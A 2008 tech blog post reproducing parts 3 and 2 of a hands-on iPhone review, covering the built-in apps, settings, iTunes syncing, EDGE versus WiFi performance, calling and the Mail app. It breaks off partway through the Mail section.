Tech Blog

iPhone review, part 3: Apps and settings, camera, iTunes, wrap-up

2008-02-13T10:38:00.000-08:00

SMS Sporting a bubbly, iChat-like interface, the SMS app mercifully threads messages, an idea Palm hatched for its Treo devices many moons ago. Users of the threaded setup became immediately addicted to it, making it difficult to move back to plain old flat SMS (darn you, Palm!) and leaving us wondering why other manufacturers didn't follow suit. Granted, the inherent 160-character limit and sometimes exorbitant per-text rates have always left traditional SMS with a paper disadvantage against data-based instant messaging, but ultimately the Short Message Service's worldwide ubiquity has crowned it the "killer app" for mobile textual communication anyway. So why not make it all purty?
Indeed, if we had to boil the iPhone's SMS down to a one-word description, "purty" would certainly be a finalist. The app's simple enough; messages from numbers that don't already have a "conversation" going get added as a new entry in the main grid. Swiping to the right on a line item here presents an option to delete the conversation entirely, while tapping it opens the bubbly goodness. At the very top, call and contact info buttons appear for contacts already in your address book; contact info is replaced with add to contacts for numbers that aren't. Below the conversation, a text field and send button do exactly what they imply. Hitting send brings up a progress bar that prevents you from doing anything else in the SMS app until the current message has been successfully sent, although you can still hit the home button and use other apps.When a message is received, you get a popup with the contact name (or number) and the message text, regardless of whether you're on a call. If you're anywhere but the standby screen, you also get ignore and view buttons; ignore will return you to your previously scheduled programming, while view sends you straight to the conversation. Like Mail, SMS shows a red circle near its icon when there are unread texts.The cutesy, drop dead simple interface doesn't come without a price, though. First of all, the SMS app is about as configurable as a DynaTAC 8000 (yep, that's pre-Zack Morris for you young'uns in the audience). Don't like your messages threaded? Sorry. Want red bubbles instead of green? Tough luck! We guess SMS alerts from our bank warning us that our checking account balance is under $50 are somehow less bothersome when presented in a shiny, rounded bubble, but we'd at least like the option of going old-school if we're so inclined.Secondly, there's no rhyme or reason to when timestamps appear. That's fine -- we get the idea, they appear when there's been a significant lapse in communication -- but we want to be able to hold down on a specific bubble to get that level of detail then. And finally, SMS offers no character counter or multi-message warning, features available on virtually every other handset on the market. The phone seems pretty smart about reassembling multiple messages into a single bubble, but that's still no reason to lull us into the false sense that this is a true IM service, especially when AT&T's default package for the iPhone only has 200 messages. And believe it or not, some of us still don't have devices that can reassemble multi-text messages anyway.
Calendar
The iPhone's calendar may possibly be the most usable we've ever seen on a cellphone -- but most of the credit there may be due to the device's massive screen. Most cellphone calendars are difficult to use, but not for lack of effort, it's for lack of screen real estate. The iPhone's huge, high res display makes it possible to get a month-view while also having enough room to show each day's events below. Dragging your finger around the days of the month instantly loads those appointments; all in all the calendar is very snappy, far more so than the mail client.Too bad we still had major problems syncing appointments made on the iPhone back to our our desktop iCal calendar. It just wouldn't happen. Appointments we created on the iPhone refused to show up on the desktop, and about half the time during sync our iPhone-created appointments would actually get deleted entirely from the device. (This may be something screwy with our phone, so we'll assume it's not expected behavior.) Appointments created on the desktop sync over fine, however, and we had no issues there -- so just be sure that you never need to make an appointment in your iPhone calendar when you're on the go. Kidding!Another issue we had with the calendar is its refusal to inherit color coding from desktop calendars, or in any way display in which calendar an appointment was made. If you're anything like us, you have a few calendars, like one for personal, work, birthdays, spouse, etc. Well, if that's the case then it sucks to be you, because all those calendars' appointments look exactly the same in the iPhone (and unlike desktop iCal, you can't set a time zone for an appointment). The iPhone calendar also lacks a week-view mode, but supplants a pretty useful appointment list instead. We wish we could take a short appointment list summary and drop it in our unlock screen -- the day's appointments is some incredibly valuable information that you shouldn't have to start, unlock, and then hit calendar to retrieve.
Photos and camera
So here's how we're picturing that this went down inside Apple HQ: there's like a couple months left before the iPhone's release, and suddenly the team realizes that they haven't created the software for the camera. They then proceed to spend five weeks on cute animations and one week on actual functionality. Yes, yes, we're quite sure that's a gross exaggeration, but we just can't remember the last time we've used a phone camera with this little functionality. Then again, maybe that's a good thing for some.When the Camera app is opened, you get a giant viewfinder and two buttons along the bottom. The large button in the middle snaps the picture and the smaller button to the left moves you to the camera roll, which is simply a special photo album within the Photos app. We understand that packing a larger sensor or a decent flash would've sacrificed more thickness and battery life than Apple was willing, but that's still no excuse to leave us without even a single configurable parameter for the camera. No scene selection, no digital zoom, no destination album, nothing.Pressing the shutter button causes a shutter animation to collapse momentarily over the viewfinder; a moment later, the just-taken picture becomes translucent and collapses down into the camera roll icon. Both animations are kinda cool but totally unnecessary. The viewfinder's refresh rate is decent -- but not even close to real realtime -- and it's far from the best we've seen. We'd estimate it's humming along at 7 or 10fps.Enough grousing, though; on to picture quality. For two megapixels, no autofocus, and no flash, we're about as impressed as we can be. Compared to the Nokia N76 -- another 2 megapixel cameraphone we've recently spent some time with -- the iPhone's pictures consistently came out clearer and with far less pixel noise. That said, it's still a lousy sensor by even ultra low-end dedicated camera standards, so we'd recommend this not be used in the field for anything but the occasional candid shot.As we mentioned, snapped photos hightail themselves over to the Photos app. The iPhone appears as a digital camera to the computer, so it'll bust open iPhoto on the Mac while PCs can configure it to import to a folder. Photo albums already on your computer (in iPhoto, Aperture, or a particular folder) can be configured to be automatically synced to Photos as well.When Photos first opens, the user is asked which album to browse; the name of the album is shown along with the number of pictures in the album. Tapping an album brings up a flickable thumbnail view of all photos within it. Here you can either tap a particular picture to bring it full screen or tap the play button at the bottom of the display to kick off a slide show. Slide show options are configured in the iPhone's settings: duration to show each photo, transition effect, repeat, and shuffle. The transitions are, for lack of better verbiage, freaking awesome ("Ripple" is our favorite).
Calling up an individual photo brings up a view that is navigationally very similar to Notes, an app that we'll be taking a look at shortly. The photo dominates the screen, while buttons at the bottom allow you to export the photo (to wallpaper, email, but only in VGA, or a contact), move to the previous / next photos, kick off a slide show, or delete the pic you're looking at. Unlike Notes, however, the interface disappears after a moment to allow you to see the entire picture unobstructed by the user interface; pinching and unpinching here will cause the displayed picture to zoom in and out.Photos also offers a couple extra goodies here that Notes does not. First, the iPhone can be rotated here as it can in Safari -- but interestingly, it can be rotated in all four orientations versus Safari's three. Second, swiping left and right moves from photo to photo. If you tap and hold, the movement will stop even if you're halfway between two photos (think of it like a roll of film), but flicking fast will not spin through multiple photos like with textual lists (iPod, Contacts, etc.). Why the left and right swipes weren't implemented in Notes, we don't know, but we're pretty bummed about it.
YouTubeHaving rolled out YouTube support for Apple TV recently and given the service its very own icon on the iPhone's home screen, it seems Apple has suddenly decided that the mother of all video sites is a key part of its entertainment portfolio. Though it's a fairly impressive and particularly feature-rich component of the handset, it's not a perfect reproduction of the desktop YouTube experience (not to suggest we won't still be capable of wasting hundreds of hours on it, of course).Opening YouTube presents an interface whose flexibility and searchability is really rivaled by nothing else on the iPhone -- not even the iPod app. Along the bottom is a toolbar with five buttons: Featured, Most Viewed, Bookmarks, Search, and More. More is really a catch-all for three other buttons that wouldn't fit on the toolbar: Most Recent, Top Rated, and History (though the toolbar can be reconfigured using the edit button, like the iPod). Lets walk through these one at a time.
Featured, Most Viewed, Most Recent, and Top Rated all roughly equate to their equivalent lists on the YouTube page, though not exactly one-to-one. We're guessing the differences are thanks to YouTube's and Apple's inability to re-encode every single video into an iPhone-friendly format in a timely fashion. Most Viewed is further divided into All, Today, and This Week with toggle buttons at the top.The grid view used in both of these views is fabulous, featuring a thumbnail of the video, the name, rating, number of views, length, and the uploading user's name. Tapping the blue arrow to the right of the video brings up yet more information in a new screen, including the full description, date added, category, tags, and a list of related videos. You also have Bookmark and Share buttons here; the former adds this video to your Bookmarks view, while the latter creates a template email with the video's URL embedded.Bookmarks contains a list of all videos that have been bookmarked on the device. Note that this is not the same favorites list found in your YouTube login -- in fact, it's not even possible to log in to one's YouTube account on the iPhone (unlike the Apple TV). The grid view here is the same one found in Featured and Most Viewed with the addition of an edit button at the top right; tapping it allows videos to be removed from the list. Inexplicably, the wipe gesture used in SMS and email isn't used here either, but rather the red circle that makes a few appearances throughout the phone.Search is, well, a search function. Tapping on the field at the top calls up the keyboard and search results appear in the grid underneath. It appears to use essentially the same logic as that on YouTube's website, though just like Featured and Most Viewed, you'll get fewer videos here since not everything has been re-encoded to the iPhone's liking just yet. History simply shows a chronological list of the most recently played videos on the device -- and rest easy, it can be cleared with a Clear button in the upper right.
Moving on to playback, this is where we're struggling a bit. We want to like this app over EDGE, we really do, but as we mentioned before, it's just a little too flaky to be much fun. Load times are long -- 15 seconds or longer, with an occasional spike as high as one minute in our testing -- and we'd sometimes get mysterious error messages saying that videos can't be played. Add in the fact that the playback resolution and bitrate is automatically "optimized" (read: scaled way down) for EDGE, and frankly, it's just more trouble than it's worth.Over WiFi, though, it's a different story altogether. Videos load quickly and the resolution seems perfectly suited for the iPhone's glorious display. During playback, controls include a scrubber, done button for returning to the video list, and a toggle switch for moving between a letterbox and stretched view (this bearing in mind that the iPhone's aspect ratio is wider than YouTube's) all along the top. At the bottom you get a volume control, bookmark button, previous and next buttons for moving to different videos in the grid, play / pause, and an envelope icon that fires up a template email the same as the share button found when viewing a video's details. For some reason, the YouTube app forces video lists to be shown in portrait and playback to be landscape -- the rotation sensor has no bearing here whatsoever, same as in iPod playing video.
Stocks
Stocks bears some striking resemblances to its cousin, the Dashboard widget of the same name. The main displays are virtually indistinguishable, though the iPhone version trades its Mac equivalent's blue background for black. Like Weather, Stocks loses its Dashboard data provider (Quote.com in this case) and adds a "Y!" logo in the lower left that, when tapped, takes the user to a Yahoo! Mobile page with a variety of information for the highlighted stock. The performance graphs at the bottom take several seconds to load, and like everything else, take longer over EDGE -- a little more than twice as long in our informal testing. Interestingly, the longer time spans took longer to load, which means they seem to actually be loading more data in the background instead of aggregating it at a lower resolution on the back end. Over EDGE, 2-year stock graphs took on average around 7 seconds to load, while on the other end of the spectrum, 1-day graphs took about 2.5 seconds. Averages -- DJIA, for example -- seem to take marginally longer. Data never appears to be cached here, so every time you tap on a different time span, you've got to wait for the data to load again.
Configuring Stocks is a simple affair; the only options are adding / removing stocks and selecting whether price changes should be displayed by value or percentage.In both cases, positive changes are shown as a green box and negative are in red. Companies can be added by symbol, full, or partial name; a results grid shows symbols that match your entered term. Annoyingly, there's no way to change the order in which stocks are listed, except but to re-enter them in the desired order.
Google maps
Using Google maps on most smartphones is an absolute pleasure. The Windows Mobile and Palm OS Gmaps apps are just fantastic -- and the iPhone ranks among them. Apple supposedly spent a lot of time working on this one (Google has historically released all its own mobile apps), and it shows. Map loads are reasonable even over EDGE (and expectedly snappy on WiFi), and being able to easily search Google local, pull up a number and address in a contact card, then call that location and route directions to it, that is an amazing mobile maps experience. Too bad the iPhone can't make use of a Bluetooth GPS receiver (wink, wink Apple!).We wish the maps app recognized a search for "home" so we could return to a default location at or near our residence (without typing it in), but users can set map bookmarks for repeat use. The traffic alerts system is also pretty impressive, but it doesn't work for all roads and freeways, so your mileage may vary (har) on that. Pulling up the satellite view on the iPhone is a thing to behold -- the crisp display shows an extraordinary amount of detail for such a small device.Our biggest complaint about the maps app, though, is something we mentioned earlier: inconsistent gesture input. Gmaps is the only app in the iPhone where two-finger single tap zooms out. This is something one can get used to, but it's still pretty disorienting, and we've found ourselves inadvertently trying the Gmaps two-finger zoom out in other apps, obviously with little result.
Weather
Anyone familiar with Mac OS X's preinstalled weather widget will feel right at home here (right down to the static Sunny / 73° icon, which we would've much preferred be updated regularly for our home city). Naturally, the layout is more vertical on the iPhone to accommodate the taller screen (and coincidentally, it seems you can't hold the phone sideways to get a landscape version of the widget). While the Dashboard widget uses AccuWeather as its data provider, the iPhone has made the jump to Yahoo! with a new "Y!" logo appearing in the lower left -- an homage to Apple's newfound relationship with the company to launch that push-IMAP email, perhaps. Pressing the logo pulls up Safari and directs you to a Yahoo! Mobile page with weather, news, events, and Flickr photos for the selected city.Configuration for the widget is about as basic as it could possibly get: hit the ubiquitous "i" icon in the lower right, select your cities and your preferred unit of temperature, and you're done. In light of the simplicity and overall lack of configurability of the phone, we're a little surprised they even bothered to offer a unit selection since the device is currently only offered in the US, but we know not everyone grew up here, and we're certainly not complaining. After you've selected your cities and hit done, you're returned to the widget's primary display. Multiple cities are indicated as small dots at the bottom of the screen, while flicking left and right changes cities. Notably, the order you enter cities is the order they'll appear -- there's no way to change that without deleting and reentering, like stocks.
Clock
Jet setters and chefs should appreciate the Clock widget, one of the better implementations of a world clock and timer (among other things) we've seen on a phone. Clock bears little resemblance to its Dashboard cousin (but that's not a bad thing). It also shares a rather unfortunate trait with Weather in that its icon doesn't reflect reality -- the time is permanently fixed at 10:15. We suppose the decision to keep it static was made because you can clearly see the time at the top of the home screen anyway, but it would've been a nice touch anyway considering that the Calendar icon reflects the actual date.At the bottom of Clock there are four buttons: World Clock, Alarm, Stopwatch, and Timer. All four function pretty much the way you'd expect. The World Clock function is great in that each selected city shows its name and an analog clock followed by a digital clock and an indication of whether the locale is yesterday, today, or tomorrow (crazy International Date Line antics!). Unlike Weather and Stocks, cities can be reordered here by dragging on the "ribbed" area at the right while in Edit mode.
The Alarm page lets you add pretty much as many alarms as you like (we had ten going). The functionality here is great; for each alarm you can select what days it's active, what sound should be played, whether Snooze is available, and the alarm's name when viewed in the grid of all alarms. The time is selected with a slot machine-style series of rollers, one each for hour, minute, and AM / PM. Once options are set up and you return to the grid, each alarm can individually be turned on and off with a switch. Having any of them set to active causes a clock icon to appear in the status bar at the top of the screen.Stopwatch and Timer are both extraordinarily simple goodies, but even so, it's still possible to make them extraordinarily unintuitive. Thankfully, the iPhone's aren't. Stopwatch simply gives the time broken down in minutes, seconds, and tenths (plus hours on the far left when you get that far) with a start and reset button; when the time is all zeroes, Reset is grayed out. Hitting start turns the left button to stop and the right button to lap. Pressing lap will add the split time to the grid directly below the buttons along with an indicator of the lap number. Hit stop, and the start and reset buttons return. Hitting Rreset will clear split times as well. The sleep behavior of the phone seems a little indeterminate while the stopwatch is running -- sometimes the screen dims, sometimes it sleeps, sometimes it stays wide awake. We couldn't nail down what (if anything) determined the phone's behavior here. Happily, you can leave the Clock app and go about your business and the stopwatch will continue running -- you can even use other parts of the Clock app itself.
As for Timer, you're presented with two slot machine-style dials, one for hour and one for minute. Below, a button asks you which sound should play when the timer expires, followed by the start button (which changes to cancel once the timer has been kicked off). Unfortunately, you cannot run multiple timers simultaneously.
Calculator
There's very little to be said about the Calculator widget -- and let's be honest, that's exactly how a simple calculator should be. You enter your digits, you do your arithmetic, and you get on with life. This particular widget has undergone a full redesign from the calculator found in Mac OS, taking on darker colors for the buttons and the background and a blue, 3D-look display. Gone are the segmented digits, replaced by a traditional smooth font (in other words, Apple wasn't too concerned about making this thing look exactly like a physical four-function calculator).Missing from the iPhone, though, are dedicated scientific / graphing calculators, or, perhaps more usefully, a tip calculator. We think any would be nice to have, and this device definitely has the necessary screen real estate to make them functional and visually appealing. In fact, the iPhone's screen is so big that a simple four-function calculator looks just a little too sparse, although it certainly makes the buttons easy to press.
Notes
Font look familiar? It should -- the iPhone Notes app ganks the Marker Felt font, perhaps best known as the default font in Stickies. Frankly, we could do without it, or at the very least we'd like an option to change it to something a little simpler and less Comic Sans-like (the iPhone's systemwide font would've been just fine, thanks). Adding a note is accomplished by clicking the "+" button found in several iPhone apps; the new note is automatically timestamped and titled based on the first line of text that you write. While editing, two buttons appear in the title bar directly above the yellow pad -- both save the note, but the Notes button kicks you back out to the list of all notes, while the done button keeps you in a read-only view of the current note. We really would've liked a cancel button here, too.In the read-only view, four icons appear at the bottom of the screen in the same casual, fun style as the font. The far left and right icons move from note to note (seems like there should be a swipe gesture here that'll accomplish the same function), the envelope creates an email with the note as the body and the first line as the subject, and the trash can predictably deletes the note. Strangely, there is no other way we can find to delete a note -- you must be looking at it to trash it. Also, we found ourselves instinctively rotating the phone from time to time in Notes, but sadly, you won't find any landscape mode here. And why no drawing capability? We're not asking for handwriting recognition or anything fancy like that, just the ability to doodle would've been a fabulous feature.
Settings
It's no secret, our favorite part of any cellphone and device is the settings area. We often find ourselves running to the settings before even making a call on a new phone or playing back some video on a new media device. When it comes to settings, by and large the iPhone doesn't disappoint. We won't go over every nook and cranny (we could do a feature on just the menus and submenus and subsubmenus... in this thing), but here are some highlights:Airplane mode - Super easy toggle, works instantaneously.Usage - Doesn't show percentage of battery remaining (lame), but does show all of your current usage stats, like standby time since last charge, etc.Sound - Comprehensive yet simple sound behavior settings, lots of toggles.Date & Time - Has a setting for time zone support on / off in calendar, convenient if you do / don't travel a lot.Network - VPN settings (supports L2TP and PPTP); WiFi settings allow you to select DHCP, BootP, or static IP address, as well as no, manual, or auto HTTP proxy.
Bluetooth - Extremely straightforward and usable interface for Bluetooth; discoverable is switched off by default, but turned on only for the duration of time you're in the Bluetooth menu. Pairing is very simple, although we kind of hoped it would use the Sidekick system of attempting common Bluetooth PINs so you don't have to remember which your headset uses, 1111, 0000, etc. Oh, and you can pair your iPhone with most anything, but don't expect it to actually do something once paired -- almost all Bluetooth profiles are disabled.Keyboard - Allows you to enable / disable auto-capitalization and caps lock.Mail - Add, delete accounts (types include POP3, IMAP, Gmail, AOL, Yahoo, .mac, and Exchange IMAP, but not Exchange EAS), auto-check messages (manual, 15, 30, or 60 minutes), message preview (0 - 5 lines), CC myself on / off, signature, etc.Phone - Contact sort / display order, call fwding, call waiting, caller ID (no option to only show ID to known contacts), and way at the bottom, the awesome AT&T services menu that remembers the codes for things like checking bill balance, viewing minutes, etc.Safari - Set your search engine (Google, Yahoo), on / off switches for JavaScript, plug-ins (what plug ins?), pop-ups. There's also a cookies menu, and clear history / cookies / cache buttons.iPod - Audiobook speed, EQ, volume limiter, etc.
iTunes, activation, and syncAs with the iPod, setting up and syncing the iPhone in iTunes is meant to be an incredibly easy experience, and for the most part it is. You're (obviously) required to have iTunes 7.3 to get it going, bet starting the guided activation setup is as easy as plugging in your phone. Although a huge number of people had understandably maddening issues during launch that caused them to be unable to use their new phones for up to a couple of days, we were able to burn through a number of different types of activations (new AT&T customer, existing AT&T customer, non-ported number, ported number, etc.) on about a half dozen phones, each in under 10 minutes -- none had any issues. It stands to reason that as the initial sales glut for the iPhone fades, this process will only become more stable.Once your device is recognized by iTunes, you can select which contacts groups, calendars, music, movies, podcasts, etc. you want to drop onto the iPhone. It took us under a minute to sync a couple hundred contacts, and not much more to do a few hundred calendar appointments. We moved about 1.5GB of music and movies over to the device in about 10 minutes -- that's a little more than 2.5MB per second. Not unbelievably fast, but if you wanted to completely refresh the entire capacity of your iPhone, that process would take under 50 minutes, which is reasonable enough. Syncing photos with your desktop is less automated than we would have liked. On a Mac, users are expected to pop open iPhoto and import manually. iTunes also backs up your iPhone's non-synced settings, such as SMS conversations, notes, call history, contact faves, sound settings, and so on. We tried it out, and sure enough, it worked well enough -- even saved our browser history. WiFi passwords? Naw, not so much.Not surprisingly, syncing to a PC is a different experience than syncing to a Mac. PC users shouldn't expect to have the iPhone take advantage of all of Vista's new iLife-like lifestyle software suite (Windows Mail, Calendar, Address Book, etc.), users can only use Outlook (not Outlook Express) to sync content. On a PC sync worked perfectly, strangely enough (considering it worked less than perfectly on a Mac). Outlook was kind enough to copy contacts and calendar appointments back and forth with ease. It was almost eerie watching an iPhone interact better with a PC and Microsoft software than with a Mac and Apple software, but kudos to Cupertino for not leaving Windows users out in the cold on this one.
Data performanceApple and AT&T are banking that a two-line attack of WiFi plus a recently-enhanced EDGE network is going to quell the call for 3G in the iPhone -- in its first iteration, anyway. We see at least three problems with that approach. First, UMTS employs a more advanced vocoder than 2G does, so we're losing out on the opportunity for moderately improved voice quality. Second, on its best day, EDGE is sill an order of magnitude slower than HSDPA on its worst day (we're talking about both throughput and latency here, with the latter often being a better indicator of perceived speed). Third -- and perhaps most importantly -- AT&T's EDGE network can't support simultaneous voice and data. Read: if you're moving data to or from your iPhone, calls will go straight to voicemail. Big time bummer. The thought of browsing with Safari on the iPhone's magnificent display while chatting on Bluetooth is a seductive one, but it ain't gonna happen.That being said, is EDGE bearable for the iPhone's core services? We'd sorta expected that Apple would've fine-tuned all of the iPhone's first-party apps to behave reasonably well regardless of what kind of data network you were feeding on, but we found that wasn't necessarily the case. Browsing in Safari was a generally satisfying experience (thanks partly to the fact that typically-large embedded Flash objects don't load), ditto for Mail, Weather, and Stocks, but YouTube really tried our patience.For a couple hours after activating the phone, we couldn't play videos period -- possibly because YouTube's and Apple's servers were being hit so hard by new owners putting their handsets through their paces -- but once we could finally get things going, we were left disappointed by load times, buffering issues, and errors. To put things in perspective, videos consistently started playing within four seconds on WiFi, whereas YouTube frequently ran over fifteen seconds. Our high was a staggering 58.1 seconds!
We guess we could live with an average of fifteen seconds, though, if they always ended up playing. They didn't. When on EDGE, we'd estimate that 10 to 15 percent of the videos we try to play churn for a few seconds then bring up a message simply (and unhelpfully) informing us that the movie can't be played. Maybe the oddest bit of all this YouTube drama is that the videos run at a much lower resolution on EDGE than they do on WiFi, obviously in an attempt to make load times reasonable and streaming possible. Perhaps that sitch will improve over time with better encoding, better EDGE, and firmware upgrades -- but for now, we're declaring YouTube a WiFi-only app.On that note, WiFi is a breath of fresh air that turns the iPhone into a data-munching powerhouse. Annoyances like slow load times in YouTube and Maps melt away, generally giving the device a very different feel. The iPhone's WiFi implementation is seamless but moderately annoying out of the box; by default, the phone regularly prompts you if you want to connect to the strongest available network, which gets old really fast, especially when walking down the street. This can be turned off from the WiFi settings, which is prominently placed near the top of the settings app -- second item, in fact, right after the Airplane Mode toggle.Other WiFi settings include a switch for the WiFi radio (not to be confused with Airplane Mode, which'll also disable the cell radio and Bluetooth) and a list of nearby SSIDs which is automatically populated when you enter the screen and refreshed about every eight seconds. Next to each network's SSID is an icon indicating whether encryption is being used, a three-bar signal strength indicator, and a blue arrow that you tap for advanced configuration (more on that in a moment). Simply tapping the SSID will connect you to the network, or if a WEP key or WPA password is necessary, you'll be prompted.After the connection is successful, the "E" icon in the status bar is replaced with a signal strength indicator -- not the most obvious way of showing that you're connected to WiFi, but sure, we get the point. If a particular network requires advanced configuration, you can tap the blue arrow at the far right which displays the IP address, subnet mask, gateway, and so on (if you're already connected), allows you to choose a method of IP address acquisition (DHCP, BootIP, or static), and set an HTTP proxy if necessary. If the network is already "remembered" for the phone, a "Forget this Network" button appears at the top to kill it from your preferred list.
Wrap-upWe're not huge fans of "conclusions" in reviews -- or number systems, or one liner pros / cons / bottom-lines for that matter. Devices have become so feature-rich over the years that potential buyers' decisions can be made or broken on the support, quality, or integration of just one or two features. For us that's exactly the case with the iPhone -- although the list of things it doesn't do is as long as the list of things it does, it's only a few small, but severe, issues about the device that truly galvanizes our opinion of it.It's easy to see the device is extraordinarily simple to use for such a full-featured phone and media player. Apple makes creating the spartan, simplified UI look oh so easy -- but we know it's not, and the devil's always in the details when it comes to portables. To date no one's made a phone that does so much with so little, and despite the numerous foibles of the iPhone's gesture-based touchscreen interface, the learning curve is surprisingly low. It's totally clear that with the iPhone, Apple raised the bar not only for the cellphone, but for portable media players and multifunction convergence devices in general.But getting things done with the iPhone isn't easy, and anyone looking for a productivity device will probably need to look on. Its browser falls pretty short of the "internet in your pocket" claims Apple's made, and even though it's still easily the most advanced mobile browser on the market, its constant crashing doesn't exactly seal the deal. The iPhone's Mail app -- from its myriad missing features to its un-integrated POP mail experience to its obsolete method of accessing your Gmail -- makes email on the iPhone a huge chore at best.For us, the most interesting thing about the iPhone is its genesis and position in the market. Apple somehow managed to convince one of the most conservative wireless carriers in the world, AT&T (then Cingular), not only to buy into its device sight-unseen, but to readjust its whole philosophy of how a device and carrier should work together (as evidenced by the radically modernized and personalized activation process). Only a few days after launch it's easy to see June 29th as a watershed moment that crystalized the fact that consumers will pay more for a device that does more -- and treats them like a human being, not a cellphone engineer. Imagine that.But is the iPhone worth the two year contract with the oft-maligned AT&T and its steep price of admission? Hopefully we gave you enough information about the iPhone's every detail to make an informed decision -- despite the iPhone's many shortcomings, we suspect the answer for countless consumers will be a resounding yes.

iPhone review, part 2: Phone, Mail, Safari, iPod

2008-02-13T10:33:00.000-08:00

Phone and contacts
Apple broke rank during its ubiquitous iPhone advertising campaign in the last few weeks -- typically the company doesn't go out of the way to highlight the specific functionality of its devices, instead choosing to sell products with iconography and emotion. But the bottom line Apple made is that the iPhone must live up to it's name: before anything else, it's a phone. And it has to be, because if it's an awful phone, no one's going to use it as their phone, get it? Well, Apple obviously succeeded here. We found nearly everything about making and receiving calls on the iPhone to be dead simple -- scratch that, pleasurable, even. It's almost enough to make us call home every weekend. (Almost.)While finding contacts might have been improved, calling contacts is as far from a chore as we've seen on a mobile. What the iPhone contact app most needs is use of the keyboard to hone in on names, like Windows Mobile's excellent Smartdial feature -- even the device's own SMS app has a keyboard-based contact finder. Instead, you're given just two options for finding your pals' contact cards: flicking up and down the list, or using the alphabet column on the right side, which makes short work of scrolling through hundreds of names.However, the pleasure of the elastic scroll-drag motion isn't to be underestimated. Despite the fact that the iPhone has no haptic feedback, traversing lists of emails, text, and songs has a nearly tactile feel due to the interface's "rubber band" effect. You can swing through about 60 contacts with a quick swipe -- traversing long lists without a scroll wheel is feasible, but if you've got a few hundred people in your address book, you'll probably soon be jonesing for keyboard-based contact search.Call functions are organized into five categories
Favorites - Apple's take on speed dial. A simple list of your favorite contacts. Adding favorites is very simple -- every non-favorite contact has a huge button allowing you to add them to the list. The list can be re-ordered by tapping edit, then using an icon on the right to drag each entry around.Recents - Shows a list of all or missed calls, and the call time / date. Incoming and outgoing calls are not differentiated, annoyingly. Missed calls are highlighted in red. Like some phones, unknown numbers have the region of call origin displayed (i.e. if you missed a call from a 415 area code number, beneath the digits it says "San Francisco, California" -- very handy!).Contacts - Your contact list, with your phone number listed at the top. (Having your number listed at the top is deceptively clever -- how many times have you needed to show someone your phone number in a loud area? For us, often.) Users can select to show all their synced contacts, or just select groups. (Creating contacts on the iPhone easily syncs back to the desktop.) Pushing against the final contact does not return the user to the top of the list, as is the typical expected behavior.Dialpad - The usual 12-key. You aren't presented with contact list-assisted dialing, but if you punch in a known number the device will give you a small prompt confirming who it is you're dialing (i.e. "Ryan Block, mobile"). From this pane users can add a dialed-in number to a new or existing contact -- users can also add numbers from the contacts pane, with the added option of plus and pause dialing. Note: numbers dialed in during calls are lost -- so prepare to take down proper notes in your phone, you can't just dial them in and save them for later, like some phones.Voicemail - Visual voicemail pane. Visual voicemail allows for email-like voicemail interaction, using caller ID and small voicemail files (transmitted to the phone automagically in the background). Visual voicemail quality leaves a lot to be desired, but we'd argue the functionality itself supersedes the audio fidelity, poor though it may be. Also in the VV pane: a speakerphone toggle and voicemail greeting option pane where you can select and locally record a new VM greeting (and transmit it back to AT&T for playback). Sorry, you can only set a single outgoing message; you can't record multiple and swap them out for various occasions (i.e. on vacation, or whatever).
Dialing a number is extremely simple: in a contact card (or in an email, or anywhere else) tap the number you want to call and it dials. That's it. In-call functions are also very simple: users are presented with just a few common options: mute, keypad, speakerphone on / off, add call (which brings up the contact list), pause, and contacts (presumably for finding someone's contact info to read into phone). Incoming calls present obvious prompts: ignore, hold call & answer, and (in a huge red button) end call & answer. Users can conference up to five calls on a single line -- the sixth call gets put on hold.
Using a Bluetooth headset is also super easy. If it's paired and powered up you'll be prompted with an audio source button instead of the speakerphone button. Tap that and you can choose which audio source you'd like to use. Note: even with a Bluetooth headset active on your phone, visual voicemail will only play into the iPhone. Call qualityAs GSM handsets go, the iPhone's voice quality can only be described as "unremarkable." Not bad, but not particularly stellar, either. Anyone stepping down from a UMTS handset will likely notice a slightly more "compressed" sound than they're used to, but the call clarity is good -- we noticed virtually no static hiss in the background. We were able to get decent volume out of the speakerphone's bottom-facing grill (particularly when set on a hard surface) but even at full volume the earpiece was a little soft for our liking. Realistically, we could've used a couple more notches -- the ability to turn it up to 11, if you will -- for use in loud environments.Likewise, folks on the other end of the call reported decent, if not good, sound quality from us. Background noise was within acceptable limits -- something that's more often a problem for candybar devices than for clamshells -- and we were coming through with plenty of volume. If anything, the most chintzy aspect of the iPhone's voice is its inability to use data while talking, and vice versa (no Class A EDGE or 3G, hint hint), but we digress.Ringtones and vibrationWe're still kind of bummed you can't (yet) add custom ringtones or even use MP3 ringtones with the massive library of tracks your iPhone is walking around with, but the default sounds are all pretty good. In fact, as far as ringtones go, they're definitely above average. (We have a feeling we're going to be hearing a LOT of "Marimba" in the coming years.) When you turn the ringer off with the side switch, the device enters vibration mode (duh); we found the iPhone's vibration totally suitable for pocket use -- both standing up, moving, and sitting down. But in-bag use is a whole 'nother game, and few phones (including this one) could rattle enough to catch our attention from inside a sack.
Mail
There's no other way than to come out and say it: we are extremely disappointed in the iPhone's email app. So much so, in fact, that despite the keyboard and the rest of the things the iPhone lacks in the features department, its mail support may be the largest factor in killing its status as a productivity device. Don't get us wrong, the application is just fine for anyone who wants to do light email, but it lacks the power and convenience that frequent-emailers require.For starters, if you've ever been out for an hour or two and checked your mail from your phone only to find a good 50 messages waiting for you, your iPhone nightmare has just begun. Scrolling through messages is just as easy as in other lists, but opening even a small, simple message has a noticeable delay -- the same kind of delay you get moving from one message to the next (with the up / down arrows), or deleting each message with the trash can button (which only appears with the message open).
One may take it for granted, but mobile email deletion can be a serious problem. The only other methods of message deletion is a swipe over the message to be deleted, then tapping the delete button; or tapping the edit button, then tapping the minus button, then tapping the delete button for each message to be erased. Maybe this doesn't sound too extrarodinary, but using the swipe-delete or edit-minus-button-delete on even a dozen or so messages is incredibly tedious.We suspect even a moderate email user won't be able to delete 20 emails on their phone without fantasizing about throwing their iPhone across the room. If you can delete 50 emails in one sitting, you deserve to be nominated for the Nobel Peace Prize. Oh, and you have to manually delete all these messages again from the trash, there's no empty trash button (only an auto-delete option buried deep within settings, which removes deleted emails never, or after a day, a week, or a month). We kid you not.Which brings us to our next serious email matter: the iPhone's complete lack of integration with Mail.app, OS X's powerful-enough mail client. We expected that if you're an email user, when you plug in your iPhone and iTunes says it's "syncing your mail accounts," that means it's actually comparing and moving messages between the device and Mail.app. Not so. In fact, the iPhone does not interact in any meaningful way with Mail.app, other than to simplify the setup on the iPhone by copying account settings over from the desktop client's settings. Specifically:
The POP mail you read on your iPhone does not show up as read in Mail.app after sync.
